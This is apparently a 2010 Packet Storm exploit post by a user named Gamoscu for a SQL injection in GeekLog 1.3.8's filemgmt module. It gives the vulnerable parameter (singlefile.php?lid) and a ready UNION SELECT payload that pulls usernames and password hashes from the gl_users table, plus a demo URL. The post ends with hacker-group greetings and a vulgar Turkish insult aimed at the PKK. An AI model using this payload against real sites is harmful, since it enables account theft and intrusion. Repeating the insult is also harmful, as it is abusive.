GeekLog 1.3.8 SQL Injection

2010-09-24T00:00:00
ID PACKETSTORM:94194
Type packetstorm
Reporter Gamoscu
Modified 2010-09-24T00:00:00

Description

                                        
                                            `GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability  
  
###########################  
  
Author : Gamoscu  
  
Homepage : http://www.1923turk.com  
  
Blog :http://gamoscu.wordpress.com/  
  
Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8  
  
Download:http://www.geeklog.net/filemgmt/viewcat.php?cid=8  
  
###########################  
  
[ Vulnerable File ]  
  
filemgmt/singlefile.php?lid=1 [ SQL ]  
  
[ XpL ]  
  
-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--  
  
[ Demo]  
  
http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--  
  
##############################################################  
#  
#  
#  
# Baybora: http://baybora.wordpress.com/  
#  
# Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO  
#  
#  
#  
# #Elektrikist#  
#  
#  
#  
# FREEGAZA  
#  
#  
# PKK ALEM SIKSIN SIZI  
#  
#############################################  
  
`